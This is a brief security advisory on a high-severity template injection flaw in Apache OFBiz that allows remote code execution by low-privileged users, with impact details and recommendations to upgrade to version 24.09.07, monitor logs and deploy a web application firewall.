A high-severity template injection vulnerability in Apache OFBiz allows low-privileged users to achieve Remote Code Execution.

This is an improper control of code generation vulnerability that enables a low-privileged authenticated user with Content/DataResource editing privileges to perform template injection attacks. This can be weaponized to achieve Remote Code Execution (RCE) on the server.

With a CVSS score of 8.8, this vulnerability is extremely dangerous. Successful exploitation grants an attacker the ability to execute arbitrary commands on the server, leading to total system compromise, exfiltration of sensitive data, and potential lateral movement within the corporate network.

Immediate Action: Upgrade Apache OFBiz to version 24.09.07 or later immediately to patch the template injection vulnerability.

Proactive Monitoring: Monitor server logs for unusual template rendering requests or suspicious shell command executions originating from the OFBiz application process.

Compensating Controls: Deploy a Web Application Firewall (WAF) with rules designed to detect and block malicious template injection payloads targeting Apache OFBiz.

Public Exploit Available: false

The ability for a low-privileged user to achieve full code execution makes this a critical priority. Organizations running Apache OFBiz should verify their version and apply the 24.09.07 update without delay to prevent unauthorized system takeover.